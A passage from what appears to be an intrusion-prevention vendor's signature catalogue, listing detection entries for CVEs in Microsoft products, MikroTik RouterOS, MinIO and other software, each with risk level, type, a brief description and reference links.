https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1307
ms19-oct
http://technet.microsoft.com/security/bulletin/ms19-oct
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1308

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1195-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1308
References:
CVE-2019-1308
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1308
ms19-oct
http://technet.microsoft.com/security/bulletin/ms19-oct
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1366

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1195-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2019-1366
References:
CVE-2019-1366
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1366
ms19-oct
http://technet.microsoft.com/security/bulletin/ms19-oct
Back to top

Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2020-1219

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Type Confusion
Description: There exists a type confusion vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Type_Confusion_Vulnerability_CVE-2020-1219
References:
CVE-2020-1219
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1219
ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun
Back to top

Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0609

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Use-after-free
Description: There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0609
References:
CVE-2019-0609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0609
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0806

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Use-after-free
Description: There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0806
References:
CVE-2019-0806
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0806
ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr
Back to top

Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0926

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Use-after-free
Description: There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0926
References:
CVE-2019-0926
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0926
ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may
Back to top

Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0940

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Use-after-free
Description: There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-0940
References:
CVE-2019-0940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0940
ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may
Back to top

Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-1052

About this vulnerability: A vulnerability in Microsoft Edge
Risk: High
First detected in: sgpkg-ips-1168-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Edge
Type: Use-after-free
Description: There exists a use after free vulnerability in Microsoft Edge. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Edge_Use_After_Free_Vulnerability_CVE-2019-1052
References:
CVE-2019-1052
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1052
ms19-jun
http://technet.microsoft.com/security/bulletin/ms19-jun
Back to top

Microsoft_Exchange_Server-Insecure_Deserialization_Vulnerability_CVE-2021-26857

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Risk: High
First detected in: sgpkg-ips-1327-5242
Last changed: sgpkg-ips-1327-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: An attempt to exploit an insecure deserialization vulnerability in Microsoft Exchange Server. Successful exploitation could lead in arbitrary code execution.
Situation: File-Text_Microsoft_Exchange_Server-Insecure_Deserialization_Vulnerability_CVE-2021-26857
References:
CVE-2021-26857
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26857
ms21-mar
http://technet.microsoft.com/security/bulletin/ms21-mar
Back to top

Microsoft_Exchange_Server-Insecure_Deserialization_Vulnerability_CVE-2021-28482

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Risk: High
First detected in: sgpkg-ips-1346-5242
Last changed: sgpkg-ips-1364-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: An attempt to exploit an insecure deserialization vulnerability in Microsoft Exchange Server. Successful exploitation could lead in arbitrary code execution.
Situation: File-TextId_Microsoft_Exchange_Server-Remote_Code_Execution_CVE-2021-28482
File-TextId_Microsoft_Exchange_Suspicious-Request_CVE-2021-28482
References:
CVE-2021-28482
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28482
Back to top

Microsoft_Exchange_Server-Remote_Code_Execution_CVE-2021-28480

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Exchange Server detected
Risk: High
First detected in: sgpkg-ips-1342-5242
Last changed: sgpkg-ips-1342-5242
Platform: Windows
Software: Exchange Server
Type: Malfunction
Description: An attempt to exploit a remote code execution vulnerability in Microsoft Exchange Server. Successful exploitation could lead in arbitrary code execution.
Situation: HTTP_SHS-Microsoft_Exchange_Server-Remote_Code_Execution_CVE-2021-28480
References:
CVE-2021-28480
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28480
Back to top

Microsoft_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1367

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-1191-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There exists a use-after-free vulnerability in Microsoft Internet Explorer. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Internet_Explorer_Use_After_Free_Vulnerability_CVE-2019-1367
References:
CVE-2019-1367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1367
ms19-sep
http://technet.microsoft.com/security/bulletin/ms19-sep
Back to top

Microsoft_Office_Directory_Traversal_Vulnerability_CVE-2019-0801

About this vulnerability: A vulnerability in Microsoft Office
Risk: High
First detected in: sgpkg-ips-1149-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Office
Type: Malfunction
Description: There exists a directory traversal vulnerability in Microsoft Office. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Office_Directory_Traversal_Vulnerability_CVE-2019-0801
References:
CVE-2019-0801
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0801
ms19-apr
http://technet.microsoft.com/security/bulletin/ms19-apr
Back to top

Microsoft_Outlook_Use_After_Free_Vulnerability_CVE-2019-1199

About this vulnerability: A vulnerability in Microsoft Outlook
Risk: High
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Outlook
Type: Use-after-free
Description: There exists a use after free vulnerability in Microsoft Outlook. Successful exploitation of this issue can result in remote code execution.
Situation: File-OLE_Microsoft_Outlook_Use_After_Free_Vulnerability_CVE-2019-1199
References:
CVE-2019-1199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1199
ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug
Back to top

Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1380

About this vulnerability: A memory corruption vulnerability in Microsoft Scripting
Risk: High
First detected in: sgpkg-ips-1269-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Use-after-free
Description: There exists a memory corruption vulnerability in Microsoft Scripting Engine. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1380
References:
CVE-2020-1380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1380
ms20-aug
http://technet.microsoft.com/security/bulletin/ms20-aug
Back to top

Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1570

About this vulnerability: A vulnerability in Microsoft Scripting Engine
Risk: High
First detected in: sgpkg-ips-1269-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a memory corruption vulnerability in Microsoft Scripting Engine. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2020-1570
References:
CVE-2020-1570
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1570
ms20-aug
http://technet.microsoft.com/security/bulletin/ms20-aug
Back to top

Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2021-31959

About this vulnerability: A vulnerability in Windows Scripting engine
Risk: High
First detected in: sgpkg-ips-1356-5242
Last changed: sgpkg-ips-1356-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a remote code execution vulnerability in Windows Scripting Engine. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Scripting_Engine_Memory_Corruption_Vulnerability_CVE-2021-31959
References:
CVE-2021-31959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31959
ms21-jun
http://technet.microsoft.com/security/bulletin/ms21-jun
Back to top

Microsoft_Sharepoint_Deserialization_Vulnerability_CVE-2022-38053

About this vulnerability: A vulnerability in Microsoft Sharepoint
Risk: Low
First detected in: sgpkg-ips-1512-5242
Last changed: sgpkg-ips-1512-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: An attempt to exploit a deserialization vulnerability in Microsoft Sharepoint was detected. Successful exploitation of this issue can result in remote code execution.
Situation: File-TextId_Microsoft_Sharepoint_Deserialization_Vulnerability_CVE-2022-38053
References:
CVE-2022-38053
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38053
ms22-oct
http://technet.microsoft.com/security/bulletin/ms22-oct
Back to top

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1257

About this vulnerability: A vulnerability in Microsoft Sharepoint
Risk: High
First detected in: sgpkg-ips-1187-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Sharepoint. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1257
References:
CVE-2019-1257
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1257
ms19-sep
http://technet.microsoft.com/security/bulletin/ms19-sep
Back to top

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1295

About this vulnerability: A vulnerability in Microsoft Sharepoint
Risk: High
First detected in: sgpkg-ips-1187-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Sharepoint. Successful exploitation of this issue can result in remote code execution.
Situation: HTTP_CRL-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1295
References:
CVE-2019-1295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1295
ms19-sep
http://technet.microsoft.com/security/bulletin/ms19-sep
Back to top

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1296

About this vulnerability: A vulnerability in Microsoft Sharepoint
Risk: High
First detected in: sgpkg-ips-1187-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Sharepoint. Successful exploitation of this issue can result in remote code execution.
Situation: File-Text_Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2019-1296
References:
CVE-2019-1296
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1296
ms19-sep
http://technet.microsoft.com/security/bulletin/ms19-sep
Back to top

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2020-16952

About this vulnerability: A vulnerability in Microsoft Sharepoint
Risk: High
First detected in: sgpkg-ips-1290-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Input Validation
Description: There exists a server-side include (SSI) vulnerability in Microsoft Sharepoint. Successful exploitation of this issue can result in remote code execution.
Situation: HTTP_CS-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2020-16952
References:
CVE-2020-16952
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16952
ms20-oct
http://technet.microsoft.com/security/bulletin/ms20-oct
Back to top

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-31181

About this vulnerability: A vulnerability in Microsoft Sharepoint
Risk: High
First detected in: sgpkg-ips-1347-5242
Last changed: sgpkg-ips-1347-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Sharepoint. Successful exploitation of this issue can result in remote code execution.
Situation: HTTP_CRL-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-31181
References:
CVE-2021-31181
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-31181
ms21-may
http://technet.microsoft.com/security/bulletin/ms21-may
Back to top

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-34467

About this vulnerability: A vulnerability in Microsoft Sharepoint
Risk: High
First detected in: sgpkg-ips-1367-5242
Last changed: sgpkg-ips-1367-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Malfunction
Description: There exists a remote code execution vulnerability in Microsoft Sharepoint. Successful exploitation of this issue can result in remote code execution.
Situation: HTTP_CSU-Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-34467
References:
CVE-2021-34467
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34467
ms21-jul
http://technet.microsoft.com/security/bulletin/ms21-jul
Back to top

Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-40487

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Sharepoint detected
Risk: High
First detected in: sgpkg-ips-1395-5242
Last changed: sgpkg-ips-1395-5242
Platform: Windows
Software: Microsoft Sharepoint
Type: Malfunction
Description: An attempt to exploit a vulnerability in Microsoft Sharepoint detected.
Situation: File-Binary_Microsoft_Sharepoint_Remote_Code_Execution_Vulnerability_CVE-2021-40487
References:
CVE-2021-40487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40487
Back to top

Microsoft_Windows_Buffer_Over_Read_Vulnerability_CVE-2019-0758

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists a buffer over read vulnerability in Microsoft Windows. Successful exploitation of this issue can result in remote code execution.
Situation: File-Binary_Microsoft_Windows_Buffer_Over_Read_Vulnerability_CVE-2019-0758
References:
CVE-2019-0758
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0758
ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may
Back to top

Microsoft_Windows_CryptoAPI_Spoofing_Vulnerability_CVE-2020-0601

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a spoofing vulnerability in Microsoft Windows was detected. Successful exploitation of this issue can result in execution of spoofed files.
Situation: File-Exe_Microsoft_Windows_CryptoAPI_Spoofing_Vulnerability_CVE-2020-0601
References:
CVE-2020-0601
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0601
ms20-jan
http://technet.microsoft.com/security/bulletin/ms20-jan
Back to top

Microsoft_Windows_Information_Disclosure_Vulnerability_CVE-2019-0703

About this vulnerability: A vulnerability in Microsoft Windows
Risk: Moderate
First detected in: sgpkg-ips-1143-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit an information disclosure vulnerability in Microsoft Windows was detected. Successful exploitation of this issue can result in information leakage that can be used to bypass ASLR.
Situation: SMB-TCP_Microsoft_Windows_Information_Disclosure_Vulnerability_CVE-2019-0703
References:
CVE-2019-0703
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0703
ms19-mar
http://technet.microsoft.com/security/bulletin/ms19-mar
Back to top

Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2019-0885

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in Microsoft Windows. Successful exploitation of this issue can result in remote code execution.
Situation: File-OLE_Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2019-0885
References:
CVE-2019-0885
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0885
ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may
Back to top

Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2020-1301

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Integer Overflow
Description: There exists an integer overflow vulnerability in Microsoft Windows. Successful exploitation of this issue can result in denial of service conditions.
Situation: SMB-TCP_Microsoft_Windows_Integer_Overflow_Vulnerability_CVE-2020-1301
References:
CVE-2020-1301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1301
ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun
Back to top

Microsoft_Windows_Integer_Underflow_Issue_Vulnerability_CVE-2019-0903

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1159-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists an integer underflow issue vulnerability in Microsoft Windows. Successful exploitation of this issue can result in remote code execution.
Situation: File-Binary_Microsoft_Windows_Integer_Underflow_Issue_Vulnerability_CVE-2019-0903
References:
CVE-2019-0903
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0903
ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may
Back to top

Microsoft_Windows_Memory_Corruption_Vulnerability_CVE-2020-0664

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows detected
Risk: High
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1370-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a memory corruption vulnerability in Microsoft Windows was detected. Successful exploitation of this issue can result in remote code execution.
Situation: LDAP_CS-Microsoft_Windows_Memory_Corruption_Vulnerability_CVE-2020-0664
References:
CVE-2020-0664
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0664
ms20-sep
http://technet.microsoft.com/security/bulletin/ms20-sep
Back to top

Microsoft_Windows_Out_Of_Bounds_Vulnerability_CVE-2020-0609

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1215-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Input Validation
Description: An attempt to exploit an out-of-bounds vulnerability in Microsoft Windows was detected. Successful exploitation of this issue can result in remote code execution. This signature also covers the vulnerability CVE-2020-0610.
Situation: Generic_UDP-Microsoft_Windows_Out_Of_Bounds_Vulnerability_CVE-2020-0609
References:
CVE-2020-0609
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0609
ms20-jan
http://technet.microsoft.com/security/bulletin/ms20-jan
Back to top

Microsoft_Windows_Out_Of_Bound_Vulnerability_CVE-2020-1284

About this vulnerability: A vulnerability in Microsoft Windows
Risk: High
First detected in: sgpkg-ips-1256-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: There exists an out of bound vulnerability in Microsoft Windows. Successful exploitation of this issue can result in kernel memory disclosure.
Situation: SMB-TCP_SS-Microsoft_Windows_Out_Of_Bound_Vulnerability_CVE-2020-1284
References:
CVE-2020-1284
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1284
ms20-jun
http://technet.microsoft.com/security/bulletin/ms20-jun
Back to top

Microsoft_Windows_SMBv3_Remote_Code_Execution_Vulnerability_CVE-2020-0796

About this vulnerability: An attempt to exploit a vulnerability in Microsoft Windows detected
Risk: High
First detected in: sgpkg-ips-1230-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Malfunction
Description: An attempt to exploit a remote code execution vulnerability in Microsoft Windows was detected. Successful exploitation of this issue can result in remote code execution. This situation also covers the vulnerability CVE-2020-1206.
Situation: SMB-TCP_Microsoft_Windows_SMBv3_Remote_Code_Execution_Vulnerability_CVE-2020-0796
References:
CVE-2020-0796
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0796
ms20-mar
http://technet.microsoft.com/security/bulletin/ms20-mar
Back to top

Microsoft_Word_Out_Of_Bound_Write_Vulnerability_CVE-2019-1201

About this vulnerability: A vulnerability in Microsoft Word
Risk: High
First detected in: sgpkg-ips-1181-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Word
Type: Malfunction
Description: There exists an out of bound write vulnerability in Microsoft Word. Successful exploitation of this issue can result in remote code execution.
Situation: File-OLE_Microsoft_Word_Out_Of_Bound_Write_Vulnerability_CVE-2019-1201
References:
CVE-2019-1201
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1201
ms19-aug
http://technet.microsoft.com/security/bulletin/ms19-aug
Back to top

Microsys-PROMOTIC-Pmbase64decode-Buffer-Overflow

About this vulnerability: A vulnerability in Microsys Promotic
Risk: High
First detected in: sgpkg-ips-637-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: PROMOTIC
Type: Buffer Overflow
Description: A stack-based buffer overflow vulnerability exists in Microsys's Promotic. The vulnerability is due to an insufficient boundary check on user-supplied data in the PmBase64Decode function. A remote, unauthenticated attacker can exploit this vulnerability by supplying a maliciously crafted base64 encoded string to the vulnerable application. Successful exploitation could lead to injection and execution of arbitrary code in the security context of the target application.
Situation: HTTP_CSH-Microsys-PROMOTIC-Pmbase64decode-Buffer-Overflow
References:
CVE-2014-9205
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9205
Back to top

Microweber-CMS-Local-File-Inclusion

About this vulnerability: A vulnerability in Microweber.
Risk: High
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1446-5242
Platform: Linux; Unix
Software: Microweber
Type: Input Validation
Description: A vulnerability in Microweber, version 1.2.10, which allows remote attackers to upload any readable file from the operating system into the backups folder, allowing the attacker to read them. Additionally original files are deleted after uploading, as a result of that files can be lost.
Situation: HTTP_CSU-Microweber-CMS-Local-File-Inclusion
Back to top

Mida-Solutions-eFramework-ajaxreq.php-Command-Injection

About this vulnerability: A vulnerability in Mida Solutions eFramework
Risk: High
First detected in: sgpkg-ips-1349-5242
Last changed: sgpkg-ips-1349-5242
Platform: Generic
Software: Mida Solutions eFramework
Type: Input Validation
Description: There exists a vulnerability in Mida Solutions eFramework, versions 2.9.0 and before, which allows remote attackers to execute arbitrary commands via the PARAM parameter to ajaxreq.php, due to insufficient validation of user input.
Situation: HTTP_CRL-Mida-Solutions-eFramework-ajaxreq.php-Command-Injection
References:
CVE-2020-15920
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15920
Back to top

MikroTik-Router-OS-Buffer-Overflow-Vulnerability-CVE-2018-7445

About this vulnerability: An attempt to exploit a vulnerability in MikroTik detected
Risk: High
First detected in: sgpkg-ips-1751-5242
Last changed: sgpkg-ips-1751-5242
Platform: Generic
Software: MikroTik
Type: Buffer Overflow
Description: A buffer overflow was found in the MikroTik RouterOS SMB service when processing NetBIOS session request messages. Remote attackers with access to the service can exploit this vulnerability and gain code execution on the system. The overflow occurs before authentication takes place, so it is possible for an unauthenticated remote attacker to exploit it.
Situation: Generic_CS-MikroTik-Router-OS-Buffer-Overflow-Vulnerability-CVE-2018-7445
References:
CVE-2018-7445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7445
Back to top

MikroTik-RouterOS-Authentication-Bypass

About this vulnerability: A vulnerability in MikroTik RouterOS
Risk: High
First detected in: sgpkg-ips-1387-5242
Last changed: sgpkg-ips-1387-5242
Platform: Generic
Software: MikroTik
Type: Directory Traversal
Description: There exists an authentication bypass vulnerability in MikroTik RouterOS. Successful exploitation could allow unauthenticated attackers to read arbitrary files.
Situation: HTTP_CS-MikroTik-RouterOS-Authentication-Bypass
Generic_CS-MikroTik-RouterOS-Authentication-Bypass
References:
CVE-2018-14847
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14847
Back to top

MineBridge-Trojan-Infection-Traffic

About this vulnerability: MineBridge trojan infection traffic was detected
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: MineBridge trojan infection traffic was detected.
Situation: HTTP_CRL-MineBridge-Trojan-Infection-Traffic
Back to top

Mini-Stream-Ripper-Buffer-Overflow

About this vulnerability: A Mini-Stream Ripper Buffer Overflow vulnerability.
Risk: High
First detected in: sgpkg-ips-758-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP
Software: Mini-Stream Ripper
Type: Buffer Overflow
Description: A buffer overflow vulnerability Mini-Stream Ripper, version 3.0.1.1, which allows remote attackers to execute arbitrary code via a long entry in a .pls file.
Situation: File-Text_Mini-Stream-Ripper-Buffer-Overflow
References:
CVE-2009-5109
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-5109
OSVDB-61341
http://www.osvdb.org/61341
Back to top

MinIO-Information-Disclosure-Vulnerability-CVE-2023-28432

About this vulnerability: An attempt to exploit a vulnerability in MinIO detected
Risk: High
First detected in: sgpkg-ips-1583-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: MinIO
Type: Insecure Configuration
Description: MinIO is a multi-cloud object storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted.
Situation: HTTP_CSU-Potential-MinIO-Information-Disclosure-Vulnerability-CVE-2023-28432
File-Text_MinIO-Information-Disclosure-Vulnerability-CVE-2023-28432
References:
CVE-2023-28432
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28432
Back to top

Minishare-1.4.1-Buffer-Overflow

About this vulnerability: Minishare 1.4.1 Buffer Overflow
Risk: Moderate
First detected in: sgpkg-ips-645-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Minishare Web Server
Type: Buffer Overflow
Description: A vulnerability exists in Minishare 1.4.1 and earlier that allows remote attackers to execute arbitrary code via a long HTTP GET request.
Situation: HTTP_CS-Minishare-1.4.1-Buffer-Overflow
References:
CVE-2004-2271
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2271
BID-11620
http://www.securityfocus.com/bid/11620
OSVDB-11530
http://www.osvdb.org/11530
Back to top

MiniUPnP-Denial-Of-Service

About this vulnerability: A MiniUPnP Denial Of Service vulnerability.
Risk: High
First detected in: sgpkg-ips-702-5211
Last changed: sgpkg-ips-1423-5242
Platform: Generic
Software: MiniUPnP
Type: Input Validation
Description: A vulnerability in MiniUPnP, versions before 1.4, which allows remote attackers to cause a denial of service condition via a crafted request that triggers a buffer over-read. This situation also covers Realtek buffer overflow vulnerability CVE-2021-35393.
Situation: Generic_UDP-MiniUPnP-Denial-Of-Service
References:
CVE-2013-0229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0229
BID-57607
